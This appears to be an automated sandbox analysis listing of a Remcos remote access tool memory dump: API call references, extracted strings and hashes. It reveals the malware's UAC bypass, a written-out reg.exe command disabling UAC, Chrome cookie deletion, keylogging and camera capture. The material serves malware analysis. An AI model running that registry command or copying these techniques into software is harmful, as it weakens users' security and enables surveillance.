                                                        • _free.LIBCMT ref: 00451048
                                                        • _free.LIBCMT ref: 00451053
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                        • int.LIBCPMT ref: 004111BE
                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                        • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                        • String ID: (mG
                                                        • API String ID: 2536120697-4059303827
                                                        • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                        • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                        • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                                        • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                        APIs
                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                          • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                          • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32 ref: 00413622
                                                          • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        • API String ID: 1866151309-2070987746
                                                        • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                        • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                        • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                                        • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                        • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                        • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                        • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                        • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                        APIs
                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                          • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                          • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                        • CoUninitialize.OLE32 ref: 00407664
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                        • API String ID: 3851391207-1839356972
                                                        • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                        • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                        • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                        • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                        • GetLastError.KERNEL32 ref: 0040BB22
                                                        Strings
                                                        • [Chrome Cookies not found], xrefs: 0040BB3C
                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                        • UserProfile, xrefs: 0040BAE8
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                        • API String ID: 2018770650-304995407
                                                        • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                        • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                        • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                        • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                        APIs
                                                        • AllocConsole.KERNEL32 ref: 0041CE35
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                        Similarity
                                                        • API ID: Console$AllocOutputShowWindow
                                                        • String ID: Remcos v$5.1.1 Pro$CONOUT$
                                                        • API String ID: 2425139147-3820604032
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 0044340D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                        • API String ID: 4061214504-213444651
                                                        APIs
                                                        • __allrem.LIBCMT ref: 0043ACE9
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                        • __allrem.LIBCMT ref: 0043AD1C
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                        • __allrem.LIBCMT ref: 0043AD51
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                        Similarity
                                                        • API ID: H_prologSleep
                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                        • API String ID: 3469354165-3054508432
                                                        APIs
                                                          • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                        • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                          • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                          • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                          • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                        Similarity
                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                        • String ID:
                                                        • API String ID: 3950776272-0
                                                        APIs
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID:
                                                        • API String ID: 4189289331-0
                                                        APIs
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16_free
                                                        • String ID: a/p$am/pm
                                                        • API String ID: 2936374016-3206640213
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                        • String ID:
                                                        • API String ID: 493672254-0
                                                        APIs
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID: PkGNG
                                                        • API String ID: 1036877536-263838557
                                                        APIs
                                                        • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • _free.LIBCMT ref: 004482CC
                                                        • _free.LIBCMT ref: 004482F4
                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • _abort.LIBCMT ref: 00448313
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PkGNG
                                                        • API String ID: 0-263838557
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                        Similarity
                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                        • String ID: PkGNG
                                                        • API String ID: 3360349984-263838557
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                        • wsprintfW.USER32 ref: 0040B22E
                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                        Similarity
                                                        • API ID: EventLocalTimewsprintf
                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                        • API String ID: 1497725170-248792730
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                        • String ID: XQG
                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                        • String ID: 0$MsgWindowClass
                                                        APIs
                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                        • CloseHandle.KERNEL32(?), ref: 004077E5
                                                        • CloseHandle.KERNEL32(?), ref: 004077EA
                                                        Strings
                                                        • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                        • API ID: CloseHandle$CreateProcess
                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                        Strings
                                                        • SG, xrefs: 00407715
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                        • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                        • SetEvent.KERNEL32(?), ref: 0040512C
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                        • String ID: KeepAlive | Disabled
                                                        APIs
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                        • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                        • String ID: Alarm triggered
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                        Strings
                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                        • _free.LIBCMT ref: 0044943D
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00449609
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        APIs
                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                          • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                        • API ID: _free
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                        • _free.LIBCMT ref: 0044F43F
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000), ref: 0041C4FB
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                        APIs
                                                        • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                        • _free.LIBCMT ref: 00448353
                                                        • _free.LIBCMT ref: 0044837A
                                                        • SetLastError.KERNEL32(00000000), ref: 00448387
                                                        • SetLastError.KERNEL32(00000000), ref: 00448390
                                                        • API ID: ErrorLast$_free
                                                        APIs
                                                        • _free.LIBCMT ref: 00450A54
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00450A66
                                                        • _free.LIBCMT ref: 00450A78
                                                        • _free.LIBCMT ref: 00450A8A
                                                        • _free.LIBCMT ref: 00450A9C
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        APIs
                                                        • _free.LIBCMT ref: 00444106
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00444118
                                                        • _free.LIBCMT ref: 0044412B
                                                        • _free.LIBCMT ref: 0044413C
                                                        • _free.LIBCMT ref: 0044414D
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PkGNG
                                                        • API String ID: 0-263838557
                                                        • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                        • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                        • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                        • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                        APIs
                                                        • _strpbrk.LIBCMT ref: 0044E7B8
                                                        • _free.LIBCMT ref: 0044E8D5
                                                          • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                          • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                                          • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                        • String ID: *?$.
                                                        • API String ID: 2812119850-3972193922
                                                        • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                        • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                        • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                        • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountEventTick
                                                        • String ID: !D@$NG
                                                        • API String ID: 180926312-2721294649
                                                        • Opcode ID: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                        • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                        • Opcode Fuzzy Hash: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
